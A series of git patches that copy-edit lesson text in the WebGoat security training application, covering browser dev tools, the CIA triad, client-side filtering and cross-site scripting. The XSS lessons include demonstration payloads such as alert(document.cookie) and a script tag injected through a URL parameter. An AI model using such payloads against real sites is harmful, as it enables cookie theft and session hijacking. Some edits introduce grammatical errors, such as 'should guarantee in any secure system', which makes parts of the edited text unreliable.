diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_Assignment_Network.adoc b/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_Assignment_Network.adoc
index b274f0452..29e1324c4 100644
--- a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_Assignment_Network.adoc
+++ b/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_Assignment_Network.adoc
@@ -1,6 +1,6 @@
 == Try It! Working with the Network tab
 
-In this assignment you need to find a specific HTTP request and read a randomized number from it.
-To start click the first button, this wil generate an HTTP request. Try to find the specific HTTP request.
+In this assignment, you need to find a specific HTTP request and read a randomized number.
+To start, click the first button. This will generate an HTTP request. Try to find the specific HTTP request.
 The request should contain a field: `networkNum:`
-Copy the number which is displayed afterwards, into the input field below and click on the check button.
\ No newline at end of file
+Copy the number displayed afterward into the input field below and click on the check button.
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_console.adoc b/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_console.adoc
index 85d155aea..0780ef6bb 100644
--- a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_console.adoc
+++ b/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_console.adoc
@@ -1,17 +1,17 @@
 == The Console tab
 
-In the console tab you can see anything, which a loaded JavaScript file may have printed out to it.
+In the console tab, you can see anything that a loaded JavaScript file may have printed out.
 Do not worry if you see something in red. While that is an error, it has probably resolved itself.
-Through the console tab, it is also possible for you to run your own line of JavaScript code.
+Through the console tab, it is also possible for you to run your line of JavaScript code.
 
-Start by clearing console using the shortcut `CTRL+L`.
+Start by clearing the console using the shortcut `CTRL+L.`
 
-To run your own JavaScript, simply click inside of the console and write something like:
-`console.log("Hello WebGoat!");` Hit enter. Hello WebGoat should now appear in your console.
-The console also allows you to do some basic arithmetic. If you type for example `1+3` and hit
-enter the console should display 4.
+To run your JavaScript, click inside of the console and write something like:
+`console.log("Hello WebGoat!");` Hit enter. `Hello WebGoat` should now appear in your console.
+The console also allows you to do some basic arithmetic. If you type, for example, `1+3` and hit
+enter, the console should display 4.
 
 Note: You may see an `undefined` in the console. You can safely  ignore this statement,
-it only means, that the JavaScript function you have called did not return anything, therefore `undefined`.
+it only means that the JavaScript function you have called did not return anything, therefore `undefined.`
 
-image::images/ChromeDev_Console_Ex.jpg[DeveloperToolsConsoleExample,500,500,style="lesson-image"]
\ No newline at end of file
+image::images/ChromeDev_Console_Ex.jpg[DeveloperToolsConsoleExample,500,500,style="lesson-image"]
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_elements.adoc b/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_elements.adoc
index cfe66bab8..18477e950 100644
--- a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_elements.adoc
+++ b/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_elements.adoc
@@ -1,22 +1,22 @@
 == The Elements Tab
 
-The elements tab allows you to look at the HTML and CSS code, that are used to define and style the website.
+The elements tab allows you to look at the HTML and CSS code used to define and style the website.
 
 === HTML source
 
-If you hover over one line you can see that a part of the website turns blue. That means that
+If you hover over one line, you can see that a part of the website turns blue. That means that
 this particular HTML line defines this section of the website.
-The elements tab allows you to make changes to every single HTML element. For example if you click inside
-a paragraph (<p>...</p>) Tag you can edit the content of the website. If you have made your changes and then click enter
-Chrome will actually update the website to show your edits. You can also change the HTML Tag used,
-the classes and id's a tag has and much more.
+The elements tab allows you to make changes to every single HTML element. For example, if you click inside
+a paragraph (<p>...</p>) Tag,  you can edit the content of the website. If you have made your changes and then click enter
+Chrome will update the website to show your edits. You can also change the HTML Tag used,
+the classes and id's a tag has, and much more.
 
 image::images/ChromeDev_Elements.jpg[DeveloperToolsElements,500,350,style="lesson-image"]
 
 === CSS source
 
-Underneath the HTML source, you can find information about the CSS which is used to style the
-Website. Like the HTML, you can also edit the CSS and therefore adjust the styling of the website.
-You can edit specific values, or turn off individual styling.
+You can find information about the CSS used to style the
+website under the HTML source. Like the HTML, you can also edit the CSS and, therefore, adjust the website's styling.
+You can edit specific values or turn off individual styling.
 
-image::images/ChromeDev_Elements_CSS.jpg[DeveloperToolsElementsCSS,500,350,style="lesson-image"]
\ No newline at end of file
+image::images/ChromeDev_Elements_CSS.jpg[DeveloperToolsElementsCSS,500,350,style="lesson-image"]
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_intro.adoc b/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_intro.adoc
index 3ce5e60fb..2689a0440 100644
--- a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_intro.adoc
+++ b/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_intro.adoc
@@ -1,19 +1,19 @@
 == Google Chrome Developer Tools
 
-To complete certain assignments you sometimes may have to look at the JavaScript
+To complete certain assignments, you sometimes may have to look at the JavaScript
 source code or run a JavaScript command on your own.
-To do that Google Chrome has a set of tools which allows you to do that and much much more.
-While these tools are not specific to Google Chrome, almost every modern browser has a set
-of their own, our introduction will focus on the ones found in Google Chrome.
-You can however still use the browser of your choice, like Firefox or Safari, although some steps of this tutorial
-may be different for you.
+To do that, Google Chrome has a set of tools that allow you to do that and much more.
+While these tools are not specific to Google Chrome, almost every modern browser has a bunch
+of its own. Our introduction will focus on the ones found in Google Chrome.
+You can, however still use the browser of your choice, like Firefox or Safari, although some steps of this tutorial
+maybe different for you.
 
-Keep in mind that the following tutorial, is not there to teach everything there is about these tools.
-This tutorial will only focus on the essential knowledge you need to complete certain assignments.
-Also if you are already familiar with these Tools you can safely skip these lessons.
+Keep in mind that the following tutorial is not there to teach everything about these tools.
+This tutorial will only focus on the essential knowledge to complete specific assignments.
+Also, if you are already familiar with these tools, you can safely skip these lessons.
 
-To get started, *open the developer tools*. There are multiple ways to open them:
+To get started: *open the developer tools*. There are multiple ways to open them:
 
-1. Right click anywhere in the browser window and select the option _"Inspect"_.
+1. Right-click anywhere in the browser window and select the option _"Inspect"_.
 2. Go to the browser menu (three dots in the top right corner), then go to _"More tools"_ and select the option _"Developer tools"_.
-3. Use the keyboard shortcut _Ctrl + Shift + I_
\ No newline at end of file
+3. Use the keyboard shortcut _Ctrl + Shift + I_
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_sources.adoc b/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_sources.adoc
index cd0d2ba06..8bd4314bd 100644
--- a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_sources.adoc
+++ b/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_sources.adoc
@@ -1,16 +1,16 @@
 == The Sources tab
 
-In the sources tab you can check out the file system and view all the HTML, CSS and JavaScript files that are used, to
-create the website. Simply click on a file to view its contents.
+In the sources tab, you can check out the file system and view all the HTML, CSS, and JavaScript files used to
+create the website. Click on a file to view its contents.
 
 image::images/ChromeDev_Sources.jpg[DeveloperToolsSources,400,500,style="lesson-image"]
 
 == The Network tab
 
-In the Network tab you can view HTTP requests and responses the website has performed.
-If you want more detailed information on a particular request, just click on it.
-In the Timeline above the blue dots represent when these requests and responses have been performed.
-You can also see the Requests done in a specific time frame, simply by clicking and dragging on the timeline. Now the window
-below, will only show the requests and responses done in that particular time frame.
+In the Network tab, you can view HTTP requests and responses the website has performed.
+Just click on it if you want more detailed information on a particular request.
+The "Timeline" above the blue dots represents when these requests and responses have been performed.
+You can also see the Requests done in a specific time frame simply by clicking and dragging on the timeline. The window
+below will only show the requests and responses done in that time frame.
 
-image::images/ChromeDev_Network.jpg[DeveloperToolsNetwork,400,500,style="lesson-image"]
\ No newline at end of file
+image::images/ChromeDev_Network.jpg[DeveloperToolsNetwork,400,500,style="lesson-image"]

From 51c007c545088e8d2f245c10872b6ccf5ac64c0b Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 13 Dec 2021 20:28:43 +0100
Subject: [PATCH 115/227] Update documentation

---
 .../main/resources/lessonPlans/en/CIA_availability.adoc   | 2 +-
 .../resources/lessonPlans/en/CIA_confidentiality.adoc     | 8 ++++----
 .../src/main/resources/lessonPlans/en/CIA_integrity.adoc  | 6 +++---
 .../cia/src/main/resources/lessonPlans/en/CIA_intro.adoc  | 6 +++---
 .../cia/src/main/resources/lessonPlans/en/CIA_quiz.adoc   | 2 +-
 5 files changed, 12 insertions(+), 12 deletions(-)

diff --git a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_availability.adoc b/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_availability.adoc
index a0c885ccc..041c344d3 100644
--- a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_availability.adoc
+++ b/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_availability.adoc
@@ -19,6 +19,6 @@ Availability is "the property of being accessible and usable on demand by an aut
 ** network traffic control
 ** firewalls
 ** physical security of hardware and underlying infrastructure
-*** protections against fire, water, and other elements
+*** protection against fire, water, and other elements
 ** hardware maintenance
 ** redundancy
diff --git a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_confidentiality.adoc b/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_confidentiality.adoc
index 7d4e4b8a5..9045d4d5e 100644
--- a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_confidentiality.adoc
+++ b/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_confidentiality.adoc
@@ -1,15 +1,15 @@
 == Confidentiality
 
-Confidentiality is "the property, that information is not made available or disclosed to unauthorized individuals, entities, or processes." In other words, confidentiality requires that unauthorized users should not be able to access sensitive resources. Confidentiality must be balanced with availability; authorized persons must still be able to access the resources they have been granted permissions for. 
+Confidentiality is "the property that information is not made available or disclosed to unauthorized individuals, entities, or processes." In other words, confidentiality requires that unauthorized users should not be able to access sensitive resources. Confidentiality must be balanced with availability; authorized persons must still access the resources they have been granted permissions for.
 
-Although confidentiality is similar to "privacy", these two words are not interchangeable. Rather, confidentiality is a component of privacy; confidentiality is implemented to protect resources from unauthorized entities.
+Although confidentiality is similar to "privacy," these two words are not interchangeable. Instead, confidentiality is a component of privacy; confidentiality is implemented to protect resources from unauthorized entities.
 
 {nbsp} +
 
 === Examples that compromise confidentiality:
 
 ** a hacker gets access to the password database of a company
-** a sensitive emails is sent to the incorrect individual
+** a sensitive email is sent to the incorrect individual
 ** a hacker reads sensitive information by intercepting and eavesdropping on an information transfer
 
 {nbsp} +
@@ -22,4 +22,4 @@ Although confidentiality is similar to "privacy", these two words are not interc
 *** multi-factor authentication (MFA)
 *** biometric verification
 ** minimizing the number of places/times the information appears
-** physical security controls such as properly secured server rooms
\ No newline at end of file
+** physical security controls such as properly secured server rooms
diff --git a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_integrity.adoc b/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_integrity.adoc
index e3978d242..cddf63cfc 100644
--- a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_integrity.adoc
+++ b/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_integrity.adoc
@@ -1,6 +1,6 @@
 == Integrity
 
-Integrity is "the property of accuracy and completeness." In other words, integrity means maintaining the consistency, accuracy and trustworthiness of data over its entire life cycle. Data must not be changed during transit and unauthorized entities should not be able to alter the data.
+Integrity is "the property of accuracy and completeness." In other words, integrity means maintaining the consistency, accuracy, and trustworthiness of data over its entire life cycle. Data must not change during transit, and unauthorized entities should not alter the data.
 
 {nbsp} +
 
@@ -13,9 +13,9 @@ Integrity is "the property of accuracy and completeness." In other words, integr
 
 {nbsp} +
 
-=== Examples of methods ensuring integrity
+=== Examples of methods ensuring the integrity
 
 ** well functioning authentication methods and access control
 ** checking integrity with hash functions
 ** backups and redundancy
-** auditing and logging
\ No newline at end of file
+** auditing and logging
diff --git a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_intro.adoc b/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_intro.adoc
index f987387fd..8804d73bd 100644
--- a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_intro.adoc
+++ b/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_intro.adoc
@@ -1,7 +1,7 @@
 == The CIA Triad
 
 The CIA Triad (confidentiality, integrity, availability) is a model for information security.
-The three elements of the triad are considered the most crucial information security components and should be guaranteed in any secure system. +
-Serious consequences can result if even one these elements is breached.
+The three elements of the triad are considered the most crucial information security components and should guarantee in any secure system. +
+Serious consequences can result if even one of these elements is breached.
 
-The CIA Triad was created to provide a baseline standard for evaluating and implementing security regardless of the underlying system and/or organization.
\ No newline at end of file
+The CIA Triad was created to provide a baseline standard for evaluating and implementing security regardless of the underlying system and/or organization.
diff --git a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_quiz.adoc b/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_quiz.adoc
index 56840faa5..90be99409 100644
--- a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_quiz.adoc
+++ b/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_quiz.adoc
@@ -1,3 +1,3 @@
 Now it's time for a quiz! Answer the following question to check if you understood the topic.
 
-Today, most systems are protected by a firewall.A properly configured firewall can prevent malicious entities from accessing a system and helps protect an organization's resources. For this quiz, imagine a system that handles personal data but is not protected by a firewall:
\ No newline at end of file
+Today, most systems are protected by a firewall. A properly configured firewall can prevent malicious entities from accessing a system and helps protect an organization's resources. For this quiz, imagine a system that handles personal data but is not protected by a firewall:

From 2589aa3fa4c1409adfb8abe23cd3f1ed97047225 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 13 Dec 2021 20:48:05 +0100
Subject: [PATCH 116/227] Update documentation

---
 .../lessonPlans/en/ClientSideFiltering_assignment.adoc      | 2 +-
 .../resources/lessonPlans/en/ClientSideFiltering_plan.adoc  | 6 +++---
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_assignment.adoc b/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_assignment.adoc
index 7a37818bf..dfb254dad 100644
--- a/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_assignment.adoc
+++ b/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_assignment.adoc
@@ -2,4 +2,4 @@
 
 You are logged in as Moe Stooge, CSO of Goat Hills Financial. You have access to everyone in the company's information,
 except the CEO, Neville Bartholomew.  Or at least you should not have access to the CEO's information. For this assignment,
-examine the contents of the page to see what extra information you can find.
\ No newline at end of file
+examine the page's contents to see what extra information you can find.
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_plan.adoc b/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_plan.adoc
index 36615a13e..ed118faf9 100644
--- a/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_plan.adoc
+++ b/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_plan.adoc
@@ -1,6 +1,6 @@
 == Client side filtering
 
-It is always a good practice to send to the client only information which they are supposed
+It is always a good practice to send only information to the client they are supposed
 to have access to.  In this lesson, too much information is being sent to the client, creating
-a serious access control problem. For this exercise, your mission is exploit the extraneous information being returned
-by the server to discover information to which you should not have access.
\ No newline at end of file
+a serious access control problem. For this exercise, your mission is to exploit the extraneous information returned
+by the server to discover information to which you should not have access.

From e169650ebce9813fdadb1dfe5c5eb3a0ab3e5b47 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 14 Dec 2021 12:14:37 +0100
Subject: [PATCH 117/227] Update documentation

---
 .../en/CrossSiteScriptingMitigation_plan.adoc |  2 +-
 .../en/CrossSiteScriptingStored_plan.adoc     |  4 ++--
 .../en/CrossSiteScripting_content1.adoc       | 13 +++++------
 .../en/CrossSiteScripting_content2.adoc       |  6 ++---
 .../en/CrossSiteScripting_content4.adoc       | 11 +++++-----
 .../en/CrossSiteScripting_content5.adoc       |  4 ++--
 .../en/CrossSiteScripting_content5a.adoc      |  6 ++---
 .../en/CrossSiteScripting_content5b.adoc      |  4 ++--
 .../en/CrossSiteScripting_content6.adoc       | 12 +++++-----
 .../en/CrossSiteScripting_content6a.adoc      |  8 +++----
 .../en/CrossSiteScripting_content6b.adoc      | 10 ++++-----
 .../en/CrossSiteScripting_content7.adoc       |  4 ++--
 .../en/CrossSiteScripting_content7b.adoc      |  4 ++--
 .../en/CrossSiteScripting_content7c.adoc      |  4 ++--
 .../en/CrossSiteScripting_content8.adoc       | 18 +++++++--------
 .../en/CrossSiteScripting_content8a.adoc      | 22 +++++++++----------
 .../en/CrossSiteScripting_content8b.adoc      |  6 ++---
 .../en/CrossSiteScripting_content8c.adoc      | 12 +++++-----
 .../en/CrossSiteScripting_content9.adoc       | 10 ++++-----
 .../en/CrossSiteScripting_plan.adoc           |  2 +-
 .../en/CrossSiteScripting_solution.adoc       |  5 -----
 .../html/CrossSiteScripting.html              | 14 ------------
 22 files changed, 80 insertions(+), 101 deletions(-)
 delete mode 100644 webgoat-lessons/cross-site-scripting/src/main/resources/lessonSolutions/en/CrossSiteScripting_solution.adoc
 delete mode 100644 webgoat-lessons/cross-site-scripting/src/main/resources/lessonSolutions/html/CrossSiteScripting.html

diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScriptingMitigation_plan.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScriptingMitigation_plan.adoc
index 06b557971..cf4a1d5dd 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScriptingMitigation_plan.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScriptingMitigation_plan.adoc
@@ -1,7 +1,7 @@
 == Concept 
 
 After learning what Cross-Site Scripting (XSS) is and how it works,
-you will know learn how you can defend against it.
+you will know to learn how you can defend against it.
 
 == Goals
 
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScriptingStored_plan.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScriptingStored_plan.adoc
index 5c09278e4..69ee15bbe 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScriptingStored_plan.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScriptingStored_plan.adoc
@@ -1,8 +1,8 @@
 == Concept 
 
-After taking a look at Reflected XSS in the previous lesson. We are now gonna take a closer look at another form of Cross-Site Scripting Attack: Stored XSS.
+After looking at Reflected XSS in the previous lesson, we are now going to take a closer look at another form of Cross-Site Scripting Attack: Stored XSS.
 
 == Goals
 * The user will learn what Stored XSS is
 * The user will demonstrate knowledge on:
-** Stored XSS injection
\ No newline at end of file
+** Stored XSS injection
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content1.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content1.adoc
index 4771c4e61..074be621a 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content1.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content1.adoc
@@ -1,16 +1,15 @@
 == What is XSS?
 
-Cross-Site Scripting (also commonly known as XSS) is a vulnerability/flaw that combines the allowance of html/script tags as input that are rendered into a browser without encoding or sanitization
+Cross-Site Scripting (also known as XSS) is a vulnerability/flaw that combines the allowance of HTML/script tags as input that renders into a browser without encoding or sanitization.
 
 === Cross-Site Scripting (XSS) is the most prevalent and pernicious web application security issue
 
-While there is a simple well-known defense for this attack, there are still many instances of it on the web.  In terms of fixing it,
-coverage of fixes also tends to be a problem. We will talk more about the defense in a little bit.
+While there is a simple well-known defense for this attack, there are still many instances on the web.  Coverage of fixes also tends to be a problem in terms of fixing it. We will talk more about the defense in a little bit.
 
 === XSS has significant impact
 
 Especially as 'Rich Internet Applications' are more and more commonplace, privileged function calls linked to via JavaScript may be compromised.
-And if not properly protected, sensitive data (such as your authentication cookies) can be stolen and used for someone else's purpose.
+And if not adequately protected, sensitive data (such as your authentication cookies) can be stolen and used for someone else's purpose.
 
 
 ==== Quick examples:
@@ -20,7 +19,7 @@ And if not properly protected, sensitive data (such as your authentication cooki
 alert("XSS Test");
 alert(document.cookie);
 ----
-* Any data field that is returned to the client is potentially injectable
+* Any data field returned to the client is potentially injectable
 +
 ----
 <script>alert("XSS Test")</script>
@@ -28,6 +27,6 @@ alert(document.cookie);
 
 == Try It!  Using Chrome or Firefox
 
-* Open a second tab and use the same url as this page you are currently on (or any URL within this instance of WebGoat).
-* Then, on that second tab open the browser developer tools and open the javascript console. And type:  `alert(document.cookie);`.
+* Open a second tab and use the same URL as this page you are currently on (or any URL within this instance of WebGoat).
+* On the second tab, open the JavaScript console in the developer tools  and type:  `alert(document.cookie);`.
 * The cookies should be the same on each tab.
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content2.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content2.adoc
index 38d9c3d89..45c9e97ad 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content2.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content2.adoc
@@ -4,11 +4,11 @@
 
 * Input fields that echo user data
 
-* Error messages that return user supplied text
+* Error messages that return user-supplied text
 
-* Hidden fields that contain user supplied data
+* Hidden fields that contain user-supplied data
 
-* Any page that displays user supplied data
+* Any page that displays user-supplied data
 ** Message boards
 ** Free form comments
 
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content4.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content4.adoc
index 727ffbc8a..4f1f7e377 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content4.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content4.adoc
@@ -4,14 +4,13 @@
 * Malicious content from a user request is displayed to the user in a web browser
 * Malicious content is written into the page after from server response
 * Social engineering is required
-* Runs with browser privileges inherited from user in browser
+* Runs with browser privileges inherited from the user in a browser
 
 === DOM-based (also technically reflected)
-* Malicious content from a user request is used by client-side scripts to write HTML to it own page
-* Similar to reflected XSS 
-* Runs with browser privileges inherited from user in browser
+* Client-side scripts use malicious content from a user request to write HTML to its page
+* Similar to reflected XSS
+* Runs with browser privileges inherited from the user in a browser
 
 === Stored or persistent
-* Malicious content is stored on the server ( in a database, file system, or other object ) and later displayed to users in a web browser
+* Malicious content is stored on the server ( in a database, file system, or other objects) and later displayed to users in a web browser
 * Social engineering is not required
-
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5.adoc
index 90804bcf5..944375013 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5.adoc
@@ -1,7 +1,7 @@
 == Reflected XSS scenario
 
-* Attacker sends a malicious URL to victim 
-* Victim clicks on the link that loads malicious web page
+* Attacker sends a malicious URL to the victim
+* Victim clicks on the link that loads a malicious web page
 * The malicious script embedded in the URL executes in the victim’s browser
 ** The script steals sensitive information, like the session id, and releases it to the attacker
 
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5a.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5a.adoc
index aaa14f5ca..4b42340d7 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5a.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5a.adoc
@@ -1,8 +1,8 @@
 == Try It! Reflected XSS
 
-The goal of the assignment is to identify which field is susceptible to XSS.
+The assignment's goal is to identify which field is susceptible to XSS.
 
-It is always a good practice to validate all input on the server-side. XSS can occur when unvalidated user input gets used in an HTTP response.
+It is always a good practice to validate all input on the server side. XSS can occur when unvalidated user input gets used in an HTTP response.
 In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
 
-An easy way to find out if a field is vulnerable to an XSS attack is to use the `alert()` or `console.log()` methods. Use one of them to find out which field is vulnerable.
\ No newline at end of file
+An easy way to find out if a field is vulnerable to an XSS attack is to use the `alert()` or `console.log()` methods. Use one of them to find out which field is vulnerable.
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5b.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5b.adoc
index 5f41ee65b..db2eb1d9d 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5b.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5b.adoc
@@ -1,10 +1,10 @@
 == Self XSS or reflected XSS?
 
-You should have been able to execute script with the last example. At this point, it would be considered 'self XSS' though.
+You should have been able to execute the script with the last example. At this point, it is considered 'self XSS,' though.
 
 Why is that?
 
-That is because there is no link that would trigger that XSS.
+That is because no link triggers that XSS.
 You can try it yourself to see what happens ... go to:
 
 link:/WebGoat/CrossSiteScripting/attack5a?QTY1=1&QTY2=1&QTY3=1&QTY4=1&field1=<script>alert('my%20javascript%20here')</script>4128+3214+0002+1999&field2=111["/WebGoat/CrossSiteScripting/attack5a?QTY1=1&QTY2=1&QTY3=1&QTY4=1&field1=<script>alert('my%20javascript%20here')</script>4128+3214+0002+1999&field2=111",window=_blank]
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6.adoc
index 12b0bef81..825867aec 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6.adoc
@@ -1,14 +1,14 @@
 == Reflected and DOM-Based XSS
 
-DOM-based XSS is another form of reflected XSS. Both are triggered by sending a link with inputs that are reflected to the browser.
-The difference between DOM and 'traditional' reflected XSS is that, with DOM, the payload will never go to the server.  It will only ever be processed by the client.
+DOM-based XSS is another form of reflected XSS. Both are triggered by sending a link with inputs reflected in the browser.
+The difference between DOM and 'traditional' reflected XSS is that, with DOM, the payload will never go to the server.  The client will only ever process it.
 
 
-* Attacker sends a malicious URL to victim
+* Attacker sends a malicious URL to the victim
 * Victim clicks on the link
 * That link may load a malicious web page or a web page they use (are logged into?) that has a vulnerable route/handler
-* If it's a  malicious web page, it may use it's own JavaScript to attack another page/url with a vulnerable route/handler
-* The vulnerable page renders the payload and executes attack in the user's context on that page/site
+* If it's a  malicious web page, it may use its own JavaScript to attack another page/URL with a vulnerable route/handler
+* The vulnerable page renders the payload and executes an attack in the user's context on that page/site
 * Attacker's malicious script may run commands with the privileges of local account
 
-*Victim does not realize attack occurred* ... Malicious attackers don't use &lt;script&gt;alert('xss')&lt;/ script&gt;
\ No newline at end of file
+*Victim does not realize attack occurred* ... Malicious attackers don't use &lt;script&gt;alert('xss')&lt;/ script&gt;
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6a.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6a.adoc
index 926abb64d..cdfaf4e17 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6a.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6a.adoc
@@ -1,15 +1,15 @@
 == Identify potential for DOM-Based XSS
 
 DOM-Based XSS can usually be found by looking for the route configurations in the client-side code.
-Look for a route that takes inputs that are being "reflected" to the page.
+Look for a route that takes inputs that are "reflected" to the page.
 
 For this example, you will want to look for some 'test' code in the route handlers (WebGoat uses backbone as its primary JavaScript library).
-Sometimes, test code gets left in production (and often times test code is very simple and lacks security or any quality controls!).
+Sometimes, test code gets left in production (and often test code is simple and lacks security or quality controls!).
 
